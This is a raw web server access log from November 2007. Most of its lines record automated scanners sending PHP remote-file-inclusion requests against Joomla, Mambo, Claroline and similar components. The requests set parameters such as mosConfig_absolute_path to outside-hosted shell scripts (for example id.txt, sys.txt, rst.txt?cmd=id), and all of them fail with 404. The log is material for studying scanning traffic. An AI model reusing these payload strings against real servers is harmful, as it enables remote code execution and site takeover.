194.0.200.9 - - [25/Nov/2007:18:13:48 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.186.39.203 - - [25/Nov/2007:18:14:00 -0800] "GET /logs/access_070910.log//modules/xfsection/modify.php?dir_module=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.186.39.203 - - [25/Nov/2007:18:14:00 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.7.203.209 - - [25/Nov/2007:18:14:46 -0800] "GET /logs//index2.php?x=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.203.209 - - [25/Nov/2007:18:14:46 -0800] "GET //index2.php?x=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:18:15:33 -0800] "GET /logs/access.log HTTP/1.0" 200 50959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.31.151.33 - - [25/Nov/2007:18:16:59 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:18:17:22 -0800] "GET /logs/access_071014.log/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.98.72.98 - - [25/Nov/2007:18:17:46 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.98.72.98 - - [25/Nov/2007:18:17:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.98.72.98 - - [25/Nov/2007:18:18:10 -0800] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.93.5.13 - - [25/Nov/2007:18:18:21 -0800] "GET /logs//index2.php?p=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
202.93.5.13 - - [25/Nov/2007:18:18:21 -0800] "GET //index2.php?p=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.22 - - [25/Nov/2007:18:18:50 -0800] "GET /labia/?D=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:19:32 -0800] "GET /logs/access_071014.log/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
213.186.39.203 - - [25/Nov/2007:18:20:11 -0800] "GET /logs/access_071014.log//modules/xfsection/modify.php?dir_module=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.93.5.13 - - [25/Nov/2007:18:22:58 -0800] "GET /logs//index2.php?pag=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.93.5.13 - - [25/Nov/2007:18:22:59 -0800] "GET //index2.php?pag=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.31.151.33 - - [25/Nov/2007:18:29:32 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.151.33 - - [25/Nov/2007:18:29:32 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.203.209 - - [25/Nov/2007:18:29:46 -0800] "GET /logs//index2.php?page=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.203.209 - - [25/Nov/2007:18:29:46 -0800] "GET //index2.php?page=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.203.209 - - [25/Nov/2007:18:30:31 -0800] "GET /logs//index2.php?p=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.203.209 - - [25/Nov/2007:18:30:31 -0800] "GET //index2.php?p=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.93.5.13 - - [25/Nov/2007:18:40:04 -0800] "GET /logs//index2.php?url=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.93.5.13 - - [25/Nov/2007:18:40:04 -0800] "GET //index2.php?url=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:18:40:43 -0800] "GET /logs/access_070625.log HTTP/1.0" 200 694248 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
206.132.195.117 - - [25/Nov/2007:18:42:51 -0800] "GET /logs/index.php?go=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.132.195.117 - - [25/Nov/2007:18:42:52 -0800] "GET /index.php?go=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:43:32 -0800] "GET ////////////administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
200.246.54.144 - - [25/Nov/2007:18:44:04 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://giks.net/php/x/rst.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:47:44 -0800] "GET ///////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.6.26.117 - - [25/Nov/2007:18:48:39 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
68.180.250.117 - - [25/Nov/2007:18:49:24 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.67.231.247 - - [25/Nov/2007:18:53:21 -0800] "GET /logs/access_070625.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.67.231.247 - - [25/Nov/2007:18:53:21 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.67.231.247 - - [25/Nov/2007:18:53:21 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.179.17 - - [25/Nov/2007:18:53:38 -0800] "GET /logs/access_070625.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.179.17 - - [25/Nov/2007:18:53:38 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.179.17 - - [25/Nov/2007:18:53:39 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.67.231.247 - - [25/Nov/2007:18:54:27 -0800] "GET /logs/access_070625.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.67.231.247 - - [25/Nov/2007:18:54:27 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.67.231.247 - - [25/Nov/2007:18:54:27 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.179.17 - - [25/Nov/2007:18:55:08 -0800] "GET /logs/access_070625.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.179.17 - - [25/Nov/2007:18:55:08 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.179.17 - - [25/Nov/2007:18:55:08 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:18:55:09 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:18:55:24 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.133.111.29 - - [25/Nov/2007:18:55:24 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:55:40 -0800] "GET /logs/access_071001.log///////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:55:40 -0800] "GET /logs///////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.228 - - [25/Nov/2007:18:55:48 -0800] "GET /labia/?S=D HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:55:56 -0800] "GET /logs/access_070917.log////////////administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:55:56 -0800] "GET /logs////////////administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:55:56 -0800] "GET /logs/access_070730.log////////////administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:18:56:59 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:18:56:59 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.246.54.144 - - [25/Nov/2007:18:57:25 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://giks.net/php/x/rst.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "galf.org"
216.120.237.150 - - [25/Nov/2007:18:57:52 -0800] "GET /logs/access_071014.log///////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:55 -0800] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:55 -0800] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
193.201.52.167 - - [25/Nov/2007:18:57:55 -0800] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:56 -0800] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:57 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:57 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:57:58 -0800] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:58:05 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:58:05 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:58:08 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:58:08 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:58:08 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:58:12 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:58:13 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:18:58:13 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://undergroundzone.net/board/images/bannerrotation/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.226.101 - - [25/Nov/2007:18:58:50 -0800] "GET //com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://hayacq.net/chat/inc/cmses/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
202.155.109.117 - - [25/Nov/2007:18:58:51 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
202.155.109.117 - - [25/Nov/2007:18:58:51 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.155.109.117 - - [25/Nov/2007:18:58:52 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.124.209.122 - - [25/Nov/2007:18:59:40 -0800] "GET /logs/access.log HTTP/1.0" 200 68883 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:19:01:16 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://pastebin.ca/raw/772045? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:19:01:17 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://pastebin.ca/raw/772045? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.155.109.117 - - [25/Nov/2007:19:02:53 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.155.109.117 - - [25/Nov/2007:19:02:54 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.155.109.117 - - [25/Nov/2007:19:02:54 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.201.52.167 - - [25/Nov/2007:19:05:08 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://pastebin.ca/raw/772045? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
193.201.52.167 - - [25/Nov/2007:19:05:08 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://pastebin.ca/raw/772045? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.249.135.11 - - [25/Nov/2007:19:06:30 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
69.57.142.34 - - [25/Nov/2007:19:07:25 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.57.142.34 - - [25/Nov/2007:19:07:25 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.67.231.247 - - [25/Nov/2007:19:07:38 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.radsmobilediscos.co.uk/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.67.231.247 - - [25/Nov/2007:19:07:38 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://zucaina.org/images/wing.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.57.142.34 - - [25/Nov/2007:19:08:07 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.57.142.34 - - [25/Nov/2007:19:08:07 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.151.33 - - [25/Nov/2007:19:16:58 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.249.135.11 - - [25/Nov/2007:19:21:38 -0800] "GET /logs/access_071028.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.249.135.11 - - [25/Nov/2007:19:21:38 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.249.135.11 - - [25/Nov/2007:19:23:39 -0800] "GET /logs/access_071008.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
63.148.182.6 - - [25/Nov/2007:19:24:15 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/nata182/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [25/Nov/2007:19:24:15 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/nata182/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [25/Nov/2007:19:24:15 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/nata182/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [25/Nov/2007:19:24:15 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/nata182/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.111.120.16 - - [25/Nov/2007:19:25:21 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/nata182/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
64.111.120.16 - - [25/Nov/2007:19:25:21 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/nata182/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
74.6.29.28 - - [25/Nov/2007:19:29:54 -0800] "GET /logs/access_070129.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:19:30:16 -0800] "GET /logs/announcements.php?phpraid_dir=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:19:30:16 -0800] "GET /announcements.php?phpraid_dir=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.151.33 - - [25/Nov/2007:19:30:24 -0800] "GET /logs/access_071028.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.151.33 - - [25/Nov/2007:19:30:24 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.57.142.34 - - [25/Nov/2007:19:31:31 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.57.142.34 - - [25/Nov/2007:19:31:31 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.57.142.34 - - [25/Nov/2007:19:32:02 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
